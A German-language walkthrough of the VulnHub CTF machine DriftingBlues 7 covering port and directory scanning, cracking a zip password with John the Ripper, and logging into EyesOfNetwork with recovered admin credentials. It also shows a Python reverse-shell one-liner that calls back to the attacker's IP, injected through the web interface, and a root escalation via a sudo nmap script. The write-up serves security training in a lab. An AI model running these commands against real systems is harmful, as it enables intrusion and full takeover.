Der folgende Artikel beschreibt meinen Lösungsweg für die CTF VM Driftingblues 7 von VulnHub, zu finden unter: DriftingBlues: 7 ~ VulnHub

Als erstes scanne ich die offnen Ports mit Service Fingerprinting um mögliche Angriffsvektoren zu finden

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
sudo nmap -sC -sV 10.22.5.112
 [sudo] password for philipp:
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-18 18:29 CEST
 Nmap scan report for 10.22.5.112
 Host is up (0.20s latency).
 Not shown: 994 closed ports
 PORT     STATE SERVICE  VERSION
 22/tcp   open  ssh      OpenSSH 7.4 (protocol 2.0)
 | ssh-hostkey:
 |   2048 c4:fa:e5:5f:88:c1:a1:f0:51:8b:ae:e3:fb:c1:27:72 (RSA)
 |   256 01:97:8b:bf:ad:ba:5c:78:a7:45:90:a1:0a:63:fc:21 (ECDSA)
 |_  256 45:28:39:e0:1b:a8:85:e0:c0:b0:fa:1f:00:8c:5e:d1 (ED25519)
 80/tcp   open  http     Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3)
 |<em>http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 |_http-title: Did not follow redirect to https://10.22.5.112/ 111/tcp  open  rpcbind  2-4 (RPC #100000) | rpcinfo: |   program version    port/proto  service |   100000  2,3,4        111/tcp   rpcbind |   100000  2,3,4        111/udp   rpcbind |   100000  3,4          111/tcp6  rpcbind |</em>  100000  3,4          111/udp6  rpcbind
 443/tcp  open  ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3)
 |_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
 | http-title: EyesOfNetwork
 |_Requested resource was /login.php##
 | ssl-cert: Subject: commonName=localhost/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
 | Not valid before: 2021-04-03T14:37:22
 |_Not valid after:  2022-04-03T14:37:22
 |_ssl-date: TLS randomness does not represent time
 3306/tcp open  mysql    MariaDB (unauthorized)
 8086/tcp open  http     InfluxDB http admin 1.7.9
 |_http-title: Site doesn't have a title (text/plain; charset=utf-8).
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 20.54 seconds

Als nächstes schaue ich ob es interessante Dateien und Verzeichnisse über den Webserver gibt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
gobuster dir -k -u https://10.22.5.112  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
 Gobuster v3.1.0
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
 [+] Url:                     https://10.22.5.112
 [+] Method:                  GET
 [+] Threads:                 10
 [+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
 [+] Negative Status codes:   404
 [+] User Agent:              gobuster/3.1.0
 [+] Timeout:                 10s
 2021/04/19 12:00:39 Starting gobuster in directory enumeration mode
 /images               (Status: 301) [Size: 235] [--> https://10.22.5.112/images/]
 /modules              (Status: 302) [Size: 196] [--> /login.php##]
 /css                  (Status: 301) [Size: 232] [--> https://10.22.5.112/css/]
 /includes             (Status: 302) [Size: 196] [--> /login.php##]
 /js                   (Status: 301) [Size: 231] [--> https://10.22.5.112/js/]
 /cache                (Status: 302) [Size: 196] [--> /login.php##]
 /include              (Status: 302) [Size: 196] [--> /login.php##]
 /module               (Status: 302) [Size: 196] [--> /login.php##]
 /included             (Status: 302) [Size: 196] [--> /login.php##]
 /nagios               (Status: 302) [Size: 196] [--> /login.php##]
 /cached               (Status: 302) [Size: 196] [--> /login.php##]
 /cacti                (Status: 302) [Size: 196] [--> /login.php##]
 /cacheviewx           (Status: 302) [Size: 196] [--> /login.php##]
 /module-httplib       (Status: 302) [Size: 196] [--> /login.php##]
 /module-urllib2       (Status: 302) [Size: 196] [--> /login.php##]
 /module-urllib        (Status: 302) [Size: 196] [--> /login.php##]
 /module-anydbm        (Status: 302) [Size: 196] [--> /login.php##]
 /module-logging       (Status: 302) [Size: 196] [--> /login.php##]
 /module-xdrlib        (Status: 302) [Size: 196] [--> /login.php##]
 /module-socket        (Status: 302) [Size: 196] [--> /login.php##]
 /module-os            (Status: 302) [Size: 196] [--> /login.php##]
 /module-ConfigParser  (Status: 302) [Size: 196] [--> /login.php##]
 /module-mimetools     (Status: 302) [Size: 196] [--> /login.php##]
 /module-HTMLParser    (Status: 302) [Size: 196] [--> /login.php##]
 /module-pickle        (Status: 302) [Size: 196] [--> /login.php##]
 /module-dumbdbm       (Status: 302) [Size: 196] [--> /login.php##]
 /module-gdbm          (Status: 302) [Size: 196] [--> /login.php##]
 /module-dbm           (Status: 302) [Size: 196] [--> /login.php##]
 /module-bsddb         (Status: 302) [Size: 196] [--> /login.php##]
 /module-dbhash        (Status: 302) [Size: 196] [--> /login.php##]
 /module-shelve        (Status: 302) [Size: 196] [--> /login.php##]
 /module-getopt        (Status: 302) [Size: 196] [--> /login.php##]
 /module-exceptions    (Status: 302) [Size: 196] [--> /login.php##]
 /module-string        (Status: 302) [Size: 196] [--> /login.php##]
 /module-random        (Status: 302) [Size: 196] [--> /login.php##]
 /module-math          (Status: 302) [Size: 196] [--> /login.php##]
 /module-imp           (Status: 302) [Size: 196] [--> /login.php##]
 /module-site          (Status: 302) [Size: 196] [--> /login.php##]
 /module-SimpleXMLRPCServer (Status: 302) [Size: 196] [--> /login.php##]
 /module-DocXMLRPCServer (Status: 302) [Size: 196] [--> /login.php##]
 /module-wsgiref       (Status: 302) [Size: 196] [--> /login.php##]
 /module-webbrowser    (Status: 302) [Size: 196] [--> /login.php##]
 /module-cgitb         (Status: 302) [Size: 196] [--> /login.php##]
 /module-urlparse      (Status: 302) [Size: 196] [--> /login.php##]
 /module-SocketServer  (Status: 302) [Size: 196] [--> /login.php##]
 /module-telnetlib     (Status: 302) [Size: 196] [--> /login.php##]
 /module-uuid          (Status: 302) [Size: 196] [--> /login.php##]
 /module-cookielib     (Status: 302) [Size: 196] [--> /login.php##]
 /module-xmlrpclib     (Status: 302) [Size: 196] [--> /login.php##]
 /module-BaseHTTPServer (Status: 302) [Size: 196] [--> /login.php##]
 /module-CGIHTTPServer (Status: 302) [Size: 196] [--> /login.php##]
 /module-SimpleHTTPServer (Status: 302) [Size: 196] [--> /login.php##]
 /module-ftplib        (Status: 302) [Size: 196] [--> /login.php##]
 /module-nntplib       (Status: 302) [Size: 196] [--> /login.php##]
 /module-gopherlib     (Status: 302) [Size: 196] [--> /login.php##]
 /module-smtplib       (Status: 302) [Size: 196] [--> /login.php##]
 /module-smtpd         (Status: 302) [Size: 196] [--> /login.php##]
 /module-imaplib       (Status: 302) [Size: 196] [--> /login.php##]
 /module-poplib        (Status: 302) [Size: 196] [--> /login.php##]
 /cachefu              (Status: 302) [Size: 196] [--> /login.php##]
 /cachedump-1          (Status: 302) [Size: 196] [--> /login.php##]
 /module-StringIO      (Status: 302) [Size: 196] [--> /login.php##]
 /module-re            (Status: 302) [Size: 196] [--> /login.php##]
 /module-xml           (Status: 302) [Size: 196] [--> /login.php##]
 /cachedlogin          (Status: 302) [Size: 196] [--> /login.php##]
 /module-Tix           (Status: 302) [Size: 196] [--> /login.php##]
 /module-Cookie        (Status: 302) [Size: 196] [--> /login.php##]
 /module-cgi           (Status: 302) [Size: 196] [--> /login.php##]
 /module-email         (Status: 302) [Size: 196] [--> /login.php##]
 /modulelist           (Status: 302) [Size: 196] [--> /login.php##]
 /module-assistant     (Status: 302) [Size: 196] [--> /login.php##]
 /cacheworthy          (Status: 302) [Size: 196] [--> /login.php##]
 /cache_now            (Status: 302) [Size: 196] [--> /login.php##]
 /modules-list         (Status: 302) [Size: 196] [--> /login.php##]
 /includemanager       (Status: 302) [Size: 196] [--> /login.php##]
 /includedcontent      (Status: 302) [Size: 196] [--> /login.php##]
 /module-dict          (Status: 302) [Size: 196] [--> /login.php##]
 /moduler              (Status: 302) [Size: 196] [--> /login.php##]
 /module-actions       (Status: 302) [Size: 196] [--> /login.php##]
 ===============================================================
 2021/04/19 12:04:19 Finished

Nichts wirklich spannendes, es handelt sich um ein Produkt mit Namen Eyesofnetwork. Ein SQL Injection Versuch auf der Login Seite war erfolglos. Also nochmals einen Port Scan mit allen 65’535 Ports starten.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
sudo nmap -sV -sC -p1-65535 10.22.5.112
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-19 12:12 CEST
 Nmap scan report for 10.22.5.112
 Host is up (0.0092s latency).
 Not shown: 65527 closed ports
 PORT     STATE SERVICE         VERSION
 22/tcp   open  ssh             OpenSSH 7.4 (protocol 2.0)
 | ssh-hostkey:
 |   2048 c4:fa:e5:5f:88:c1:a1:f0:51:8b:ae:e3:fb:c1:27:72 (RSA)
 |   256 01:97:8b:bf:ad:ba:5c:78:a7:45:90:a1:0a:63:fc:21 (ECDSA)
 |_  256 45:28:39:e0:1b:a8:85:e0:c0:b0:fa:1f:00:8c:5e:d1 (ED25519)
 66/tcp   open  http            SimpleHTTPServer 0.6 (Python 2.7.5)
 |<em>http-server-header: SimpleHTTP/0.6 Python/2.7.5 |_http-title: Scalable Cost Effective Cloud Storage for Developers 80/tcp   open  http            Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3) |_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 |_http-title: Did not follow redirect to https://10.22.5.112/ 111/tcp  open  rpcbind         2-4 (RPC #100000) | rpcinfo: |   program version    port/proto  service |   100000  2,3,4        111/tcp   rpcbind |   100000  2,3,4        111/udp   rpcbind |   100000  3,4          111/tcp6  rpcbind |</em>  100000  3,4          111/udp6  rpcbind
 443/tcp  open  ssl/http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3)
 |_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
 | http-title: EyesOfNetwork
 |_Requested resource was /login.php##
 | ssl-cert: Subject: commonName=localhost/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
 | Not valid before: 2021-04-03T14:37:22
 |_Not valid after:  2022-04-03T14:37:22
 |_ssl-date: TLS randomness does not represent time
 2403/tcp open  taskmaster2000?
 3306/tcp open  mysql           MariaDB (unauthorized)
 8086/tcp open  http            InfluxDB http admin 1.7.9
 |_http-title: Site doesn't have a title (text/plain; charset=utf-8).
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 520.82 seconds

Aha es gibt noch einen HTTP Server der auf Port 66 hört. Auch gegen diesen Webserver starte ich eine Directory Enumeration.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
gobuster dir -u http://10.22.5.112:66 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
 Gobuster v3.1.0
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
 [+] Url:                     http://10.22.5.112:66
 [+] Method:                  GET
 [+] Threads:                 10
 [+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
 [+] Negative Status codes:   404
 [+] User Agent:              gobuster/3.1.0
 [+] Timeout:                 10s
 2021/04/19 12:51:51 Starting gobuster in directory enumeration mode
 /index_files          (Status: 301) [Size: 0] [--> /index_files/]
 /eon                  (Status: 200) [Size: 248]
 ===============================================================
 2021/04/19 13:07:18 Finished

Im Pfad /eon befindet sich ein Base64 codiertes Dokument, welches sich als Passwort geschütztes ZIP Archiv entpuppt. Ich starte John the Ripper mit der default Wordlist und siehe da das Passwort lautet killah

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
curl -so- http://10.22.5.112:66/eon | base64 -d > eon.zip
zip2john eon.zip > eon.hash
 ver 2.0 eon.zip/creds.txt PKZIP Encr: cmplen=31, decmplen=19, crc=D65B49F1
john eon.hash
 Using default input encoding: UTF-8
 Loaded 1 password hash (PKZIP [32/64])
 Will run 8 OpenMP threads
 Proceeding with single, rules:Single
 Press 'q' or Ctrl-C to abort, almost any other key for status
 Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
 Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
 Almost done: Processing the remaining buffered candidate passwords, if any.
 Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
 Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
 Proceeding with incremental:ASCII
 killah           (eon.zip/creds.txt)
 1g 0:00:00:03 DONE 3/3 (2021-04-19 13:12) 0.2865g/s 2764Kp/s 2764Kc/s 2764KC/s kadrr3..kill3n
 Use the "--show" option to display all of the cracked passwords reliably
 Session completed

Im ZIP Archiv ist die Datei creds.txt und diese enthält ihrem entsprechend einen Admin Zugang

1
2
3
4
5
6
7
unzip eon.zip
 Archive:  eon.zip
 [eon.zip] creds.txt password:
  extracting: creds.txt
cat creds.txt
 admin
 isitreal31__

Mit den Zugangsdaten melde ich mich in der eyesofnetwork Software an. Unter Apply configuration gibt es die Möglichkeit einen Configuration Sanity Check mittels frei wählbarem Command zu starten.

image-7-1024x693.png

Also starte ich einen Listener und führe einen Reverse Connect mit Python aus.

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.3.38",8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Ich erhalte eine Shell als Apache Benutzer, welcher zufällig sudo Rechte besitzt, mit denen er unter anderem Nmap starten kann. Dazu ein kleines Script und ich habe eine Root Shell.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
nc -nlvp 8000
 listening on [any] 8000 connect to [172.22.220.4] from (UNKNOWN) [172.22.220.4] 56946
 sh: no job control in this shell
 sh-4.2$ id
 id
 uid=48(apache) gid=48(apache) groups=48(apache),991(eyesofnetwork)
 sh-4.2$ sudo -l
 sudo -l
 Matching Defaults entries for apache on driftingblues:
     !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
     env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
     env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
     env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
     env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
     env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
     secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
 User apache may run the following commands on driftingblues:
     (root) NOPASSWD: /bin/systemctl * snmptt, /bin/systemctl * snmptrapd,
         /bin/systemctl * snmpd, /bin/systemctl * nagios, /bin/systemctl * gedd,
         /usr/bin/nmap
 sh-4.2$ TF=$(mktemp)
 TF=$(mktemp)
 sh-4.2$ echo 'os.execute("/bin/sh")' > $TF
 echo 'os.execute("/bin/sh")' > $TF
 sh-4.2$ sudo nmap --script=$TF
 sudo nmap --script=$TF
 Starting Nmap 6.40 ( http://nmap.org ) at 2021-04-19 07:48 EDT
 NSE: Warning: Loading '/tmp/tmp.HDmLHQlXhw' -- the recommended file extension is '.nse'.
 id
 uid=0(root) gid=0(root) groups=0(root)
 cat /root/flag.txt
 flag 1/1
 ░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
 ░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
 ░░░░█░░░░░░░░░░░░░░░░░░░░░░█
 ░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
 ░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
 █░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
 █░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
 ░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
 ░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
 ░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
 ░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
 ░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
 ░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
 ░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
 ░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
 ░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
 ░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
 ░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
 ░░█░░▌░█░░█░░█░░░█░░█░░█
 ░░█░░▀▀░░██░░█░░░█░░█░░█
 ░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
 congratulations!

Game Over 💪